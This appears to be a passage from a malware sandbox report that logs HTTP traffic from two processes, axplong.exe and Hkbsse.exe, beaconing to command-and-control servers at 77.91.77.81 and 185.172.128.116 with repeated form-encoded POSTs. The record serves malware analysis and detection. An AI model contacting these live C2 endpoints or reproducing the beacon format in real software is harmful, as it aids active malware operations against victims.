Jun 24, 2024 00:11:15.201500893 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:15.396610975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	52973	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:14.564182997 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:15.249564886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	52974	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:15.259341955 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:15.941152096 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	52975	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:15.515464067 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:16.152024031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:16.153143883 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:16.344892979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	52976	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:16.065026045 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:16.785708904 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:16.798517942 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:17.029810905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	52977	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:16.453087091 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:17.085525036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:17.088450909 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:17.278152943 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	52978	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:17.151710033 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	52979	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:17.174815893 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:17.940594912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	52980	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:17.399542093 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:18.037220001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:18.043392897 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:18.236843109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	52982	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:18.057895899 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:18.754570961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	52983	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:18.353543043 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:18.994554996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:18.995476007 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:19.191968918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	52984	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:18.768958092 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:19.638891935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	52985	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:19.306265116 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:19.960285902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:19.961247921 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:20.155522108 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	52986	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:19.763175964 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:20.461874008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:20.485650063 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:20.714934111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	52987	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:20.277791023 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:21.102793932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:21.103816032 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:21.300390005 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	52988	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:20.840220928 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:21.534651041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	52989	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:21.415699959 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:22.057346106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
